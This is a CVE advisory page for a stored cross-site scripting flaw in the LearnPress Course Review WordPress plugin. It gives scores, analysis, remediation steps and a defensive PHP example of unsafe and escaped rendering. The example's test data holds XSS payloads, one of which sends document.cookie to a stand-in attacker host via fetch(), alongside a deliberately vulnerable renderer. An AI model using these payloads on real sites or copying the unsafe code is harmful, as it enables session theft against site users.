Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress LearnPress – Course Review learnpress-course-review allows Stored XSS. This issue affects LearnPress – Course Review: from n/a through <= 4.1.9.
Published: 2026-01-22
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross-site Scripting (client‑side code injection)
Action: Patch
AI Analysis

Impact

The plugin stores arbitrary user input from its review fields without neutralizing it and later renders that input into course pages. The result is a stored cross-site scripting flaw (CWE-79): an attacker who can submit a review can inject JavaScript that executes in the browser of every user who views the affected review, potentially enabling credential theft, session hijacking, or defacement of the site as seen by those users.

Affected Systems

The vulnerability affects the ThimPress LearnPress – Course Review WordPress plugin in all releases up to and including version 4.1.9 (the lower bound is not specified). The description does not name a fixed version.

Risk and Exploitability

The CVSS 3.1 base score of 6.5 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L) rates this a medium-severity issue: the attack is network-reachable and low complexity, but it requires low privileges (an account able to submit a review) and user interaction (a victim must view the stored review), and the changed scope reflects that the payload runs in other users' browsers rather than on the server. The EPSS of less than 1% indicates a low estimated likelihood of exploitation at the time of analysis; the vulnerability is not listed in CISA's KEV catalog, and the SSVC assessment records no known exploitation and marks the attack as not automatable. In practice an attacker who can post a review only needs to place script or an event-handler attribute in a review field, and it executes for every user who renders that review. Overall, the risk is moderate but the current exploitation probability is relatively low.

Generated by OpenCVE AI on April 16, 2026 at 02:02 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the LearnPress – Course Review plugin to the latest available version (greater than 4.1.9) or a patched release that properly sanitizes review input.
  • If an upgrade is not immediately possible, disable or remove the review feature from the site or restrict review submission to trusted users only.
  • Apply additional sanitization by escaping review content at output in the plugin's templates; for example, ensure review text passes through WordPress's esc_html() (or esc_attr() when it lands inside an attribute), and use wp_kses_post() only where limited formatting HTML in reviews is intended.

Generated by OpenCVE AI on April 16, 2026 at 02:02 UTC.
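
The rendering fix that the Impact paragraph and the third recommended action describe, as an added example that is not LearnPress code: a deliberately vulnerable review template next to a hardened one that encodes each field for its output context (esc_attr() for attribute values, an integer cast for the rating, wp_kses_post() for the review body), plus a DOMDocument-based check that parses the rendered fragment roughly the way a browser would and reports whether any script element, on* event-handler attribute or javascript: URL survived. The $review array, its field names and the attacker.example host are constructed for the example; it assumes it runs with WordPress loaded (for instance via wp eval-file), because the escaping functions come from core.

```php
<?php
// Added example, not LearnPress code. Must run with WordPress loaded
// (e.g. wp eval-file render_check.php) so esc_attr() and wp_kses_post() exist.

// Constructed review record carrying three common stored-XSS payloads:
// an attribute breakout in the title, a script tag in the body, and
// markup smuggled into a field that should only ever hold a number.
$review = [
    'title'   => '"><img src=x onerror=alert(document.cookie)>',
    'content' => 'Great course! <script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'rating'  => '5<svg onload=alert(1)>',
];

// VULNERABLE (CWE-79): stored fields are concatenated into HTML unchanged.
function render_review_unsafe(array $review): string
{
    return '<div class="review" data-title="' . $review['title'] . '">'
         . '<span class="rating">' . $review['rating'] . '</span>'
         . '<p>' . $review['content'] . '</p>'
         . '</div>';
}

// HARDENED: every field is encoded for the context it lands in.
// esc_attr() for attribute values, an integer cast for the numeric rating,
// wp_kses_post() for body text where limited formatting HTML is allowed
// (use esc_html() instead if reviews should carry no markup at all).
function render_review_safe(array $review): string
{
    return '<div class="review" data-title="' . esc_attr($review['title']) . '">'
         . '<span class="rating">' . (int) $review['rating'] . '</span>'
         . '<p>' . wp_kses_post($review['content']) . '</p>'
         . '</div>';
}

// Check: parse the fragment with DOMDocument and look for anything that
// would execute. A regex over the raw string is not enough here, because
// the escaped attacker text still contains "onerror=" as inert characters.
function has_active_content(string $html): bool
{
    $dom = new DOMDocument();
    libxml_use_internal_errors(true);
    $dom->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();

    if ($dom->getElementsByTagName('script')->length > 0) {
        return true;
    }
    foreach ($dom->getElementsByTagName('*') as $element) {
        foreach ($element->attributes as $attr) {
            $name = strtolower($attr->name);
            if (strncmp($name, 'on', 2) === 0) {
                return true; // inline event handler such as onerror/onload
            }
            if (in_array($name, ['href', 'src', 'action'], true)
                && preg_match('/^\s*javascript:/i', $attr->value)) {
                return true; // javascript: URL in a navigating attribute
            }
        }
    }
    return false;
}

printf("unsafe render contains executable content: %s\n",
    has_active_content(render_review_unsafe($review)) ? 'yes' : 'no');
printf("safe render contains executable content:   %s\n",
    has_active_content(render_review_safe($review)) ? 'yes' : 'no');
```

The check is deliberately run on the rendered output rather than on the stored input: wp_kses_post() strips the script tags but leaves their text, and esc_attr() leaves the attacker's onerror= string intact as harmless characters, so only parsing the result as HTML tells you whether the neutralization actually worked for the context the field was emitted into.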

Advisories

No advisories yet.

History

Fri, 23 Jan 2026 16:45:00 +0000

Type                 Values Removed    Values Added
First Time appeared                    Thimpress
                                       Thimpress learnpress
                                       Wordpress
                                       Wordpress wordpress
Vendors & Products                     Thimpress
                                       Thimpress learnpress
                                       Wordpress
                                       Wordpress wordpress

Thu, 22 Jan 2026 23:00:00 +0000

Type          Values Removed    Values Added
Description                     Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress LearnPress – Course Review learnpress-course-review allows Stored XSS. This issue affects LearnPress – Course Review: from n/a through <= 4.1.9.
Title                           WordPress LearnPress – Course Review plugin <= 4.1.9 - Cross Site Scripting (XSS) vulnerability
Weaknesses                      CWE-79
References
Metrics                         cvssV3_1
                                {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}
                                ssvc
                                {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Subscriptions

Thimpress Learnpress
Wordpress Wordpress
MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-01T14:14:08.392Z

Reserved: 2026-01-22T14:42:24.567Z

Link: CVE-2026-24361

Vulnrichment

Updated: 2026-01-22T20:34:47.018Z

NVD

Status: Deferred

Published: 2026-01-22T17:16:39.820

Modified: 2026-04-15T00:35:42.020

Link: CVE-2026-24361

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-16T02:15:21Z

Weaknesses